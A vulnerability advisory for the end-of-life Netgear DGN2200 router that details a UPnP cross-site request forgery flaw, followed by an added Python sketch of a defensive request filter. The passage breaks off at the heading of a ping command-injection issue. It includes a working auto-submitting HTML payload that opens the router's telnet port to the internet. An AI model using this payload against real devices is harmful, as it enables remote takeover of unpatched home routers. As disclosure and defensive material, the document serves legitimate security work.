NetGear N300 DGN2200 Multiple Security Vulnerabilities

Published: 2014-02-12
Updated: 2014-02-15

Affected systems:
Netgear N300 DGN2200 1.0.0.36-7.0.37
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65530

The NetGear N300 DGN2200 is a wireless router.

The NetGear N300 DGN2200 (firmware version 1.0.0.36-7.0.37) suffers from local information disclosure, cross-site request forgery, arbitrary file access, remote command execution, unauthorized access and security-restriction bypass vulnerabilities. An attacker can exploit them to bypass certain security restrictions, obtain sensitive information, perform unauthorized operations, gain unauthorized access and execute arbitrary commands in the context of the affected application.

Source: Andrew Horton

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!

NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities

EDB-ID: 31617    CVE: N/A    OSVDB-ID: N/A
Author: Andrew Horton    Published: 2014-02-12    Verified: Not Verified
Title: Multiple vulnerabilities in NETGEAR N300 WIRELESS ADSL2+ MODEM ROUTER DGN2200
====================================================================================

    Notification Date:  11 February 2014
    Affected Vendor:    NetGear
    Affected Hardware:  NetGear DGN2200 N300 Wireless ADSL2+ Modem Router
    Firmware Version:   V1.0.0.36-7.0.37
    Issue Types:        * Command Injection
                        * Cross-site Request Forgery
                        * UPNP Exploitation through Cross-site Request Forgery
                        * Insecure FTP Root
                        * Cannot Disable WPS
                        * Passwords Stored in Plaintext
                        * Information Disclosure
                        * Firmware Update MITM
    Advisory Code:      AIS-2014-003
    Discovered by:      Andrew Horton
    Issue status:       No patch available - product beyond End of Life


Summary
=======
BAE Systems Applied Intelligence researcher Andrew Horton has identified that the NetGear N300 Wireless ADSL 2+ Modem Router model DGN2200 suffers from multiple vulnerabilities which may be exploited by both local and remote attackers. This enables an attacker to completely compromise the device and stage further attacks against the local network and the internet.

NetGear have indicated that this product is beyond its end of life and therefore these vulnerabilities will not be patched. As a result, BAE Systems have delayed release of this advisory for over 12 months to reduce the likelihood of active exploitation.


1.  UPNP Vulnerable to CSRF
===========================

Requires
--------
Luring an unauthenticated or authenticated user to an attacker-controlled webpage.


Description
-----------
The Universal Plug and Play (UPNP) implementation used by NetGear accepts an HTTP POST request as a valid XML request, rendering the UPNP service vulnerable to inter-protocol Cross-Site Request Forgery attacks. This can be used to bypass or alter firewall rules.

The UPNP interface of the router listens on TCP port 5000 and can only be accessed from the LAN side of the device. UPNP requests do not require password authentication. The LAN-only restriction does not prevent exploitation because the forged request is initiated by a user's browser, which is already on the LAN side of the device.


Impact
------
Using this vulnerability, BAE Systems was able to add new firewall rules to enable internet access to the insecure telnet port and the admin web interface.


Proof of concept
----------------
The following webpage will make telnet for the router accessible to the internet so that it may be attacked using the GearDog backdoor (See issue 5). The GearDog backdoor is a known remote access backdoor implemented in many NetGear products. This requires brute-forcing the MAC address.

    <html>
    <form action="http://192.168.0.1:5000/Public_UPNP_C3" method="post" ENCTYPE="text/plain">
    <textarea><?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
    .<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
    <NewPortMappingDescription>hax3</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>192.168.0.1</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>887</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>23</NewInternalPort>
    .</m:AddPortMapping>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope></textarea>
    <input type="submit" >
    </form>
    <script> document.forms[0].submit();</script>
    </html>

Note: 192.168.0.1 is the default LAN IP address. Port 23 is the internal port number and port 887 is the external port number to be opened.


Solution
--------
Ensure that UPNP requests sent through HTTP POST parameters are not honoured.
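As an added example, not taken from the advisory or from NetGear's firmware, the following Python sketch implements the remediation above for an embedded UPnP control endpoint. It honours only SOAP control requests that a real UPnP control point could have sent (an HTML form can only submit form-encoded, multipart or text/plain bodies and cannot set a SOAPAction header without a CORS preflight), and, as defence in depth against the impact described in this issue, it refuses AddPortMapping calls that would expose the gateway's own management ports. The HttpRequest shape, the lower-cased header names, the management-port list and the three sample requests are assumptions constructed for the illustration; the default address 192.168.0.1 and ports 23 and 887 are the advisory's own.

```python
# Added example, not part of the advisory or of NetGear's firmware: a gatekeeper
# for a UPnP control endpoint that only honours genuine SOAP control requests.
from dataclasses import dataclass
from xml.etree import ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
# Media types a genuine UPnP control point uses. An HTML form can only submit
# application/x-www-form-urlencoded, multipart/form-data or text/plain, and a
# page script setting text/xml or a SOAPAction header triggers a CORS preflight
# that a UPnP server does not implement, so these checks close the CSRF path.
ALLOWED_CONTENT_TYPES = {"text/xml", "application/soap+xml"}
GATEWAY_ADDRESS = "192.168.0.1"              # default LAN address from the advisory
MANAGEMENT_PORTS = {22, 23, 80, 443, 5000}   # constructed list of admin services


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict   # assumption: header names already lower-cased by the HTTP layer
    body: bytes


def reject_reason(req: HttpRequest):
    """Return None when the request may be honoured, else a short reason string."""
    if req.method != "POST":
        return "method"
    media_type = req.headers.get("content-type", "").split(";")[0].strip().lower()
    if media_type not in ALLOWED_CONTENT_TYPES:
        return "content-type"
    soapaction = req.headers.get("soapaction", "").strip()
    if not soapaction:
        return "missing SOAPAction"
    # Control points are not browsers; a browser always attaches one of these.
    if "origin" in req.headers or "referer" in req.headers:
        return "browser-originated"
    try:
        root = ET.fromstring(req.body)
    except ET.ParseError:
        return "malformed xml"
    if root.tag != f"{{{SOAP_ENV}}}Envelope":
        return "not a SOAP envelope"
    soap_body = root.find(f"{{{SOAP_ENV}}}Body")
    if soap_body is None or len(soap_body) != 1:
        return "bad SOAP body"
    action = soap_body[0]
    if not action.tag.startswith("{"):
        return "unqualified action"
    service_ns, action_name = action.tag[1:].split("}", 1)
    # SOAPAction must name the same service and action as the body does.
    if soapaction != f'"{service_ns}#{action_name}"':
        return "SOAPAction mismatch"
    if action_name == "AddPortMapping":
        return port_mapping_reason(action)
    return None


def port_mapping_reason(action):
    """Defence in depth: refuse mappings that expose the gateway's own services."""
    def arg(name):
        el = action.find(name)   # UPnP action arguments are unqualified children
        return (el.text or "").strip() if el is not None else ""
    if arg("NewInternalClient") == GATEWAY_ADDRESS:
        return "mapping targets gateway"
    try:
        internal_port = int(arg("NewInternalPort"))
    except ValueError:
        return "bad internal port"
    if internal_port in MANAGEMENT_PORTS:
        return "mapping targets management port"
    return None


# Constructed sample requests: what a form-based proof of concept produces, a
# genuine control request from a LAN client, and the same mapping relayed by a
# real control point with correct headers (content gate passes, policy refuses).
FORGED_REQUEST = HttpRequest(
    "POST", "/Public_UPNP_C3",
    {"content-type": "text/plain", "origin": "http://attacker.example",
     "referer": "http://attacker.example/"},
    b'<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">'
    b'<NewInternalClient>192.168.0.1</NewInternalClient><NewInternalPort>23</NewInternalPort>'
    b'<NewExternalPort>887</NewExternalPort><NewProtocol>TCP</NewProtocol>'
    b'</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>',
)
GENUINE_REQUEST = HttpRequest(
    "POST", "/Public_UPNP_C3",
    {"content-type": 'text/xml; charset="utf-8"',
     "soapaction": '"urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"'},
    b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<s:Body><u:GetExternalIPAddress xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"/>'
    b'</s:Body></s:Envelope>',
)
RELAYED_MAPPING = HttpRequest(
    "POST", "/Public_UPNP_C3",
    {"content-type": "text/xml",
     "soapaction": '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"'},
    FORGED_REQUEST.body,
)

if __name__ == "__main__":
    for name, req in (("forged", FORGED_REQUEST), ("genuine", GENUINE_REQUEST),
                      ("relayed", RELAYED_MAPPING)):
        print(f"{name}: {reject_reason(req) or 'accepted'}")
```

The Content-Type and SOAPAction checks alone defeat the form-based vector; the Origin/Referer check is a cheap extra signal, and the mapping policy means that even an authenticated, well-formed client cannot use UPnP to publish the router's telnet or admin interface on the WAN.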

2.  Command Execution with Ping
===============================

Requires
--------
Authenticated access to the web administration interface.
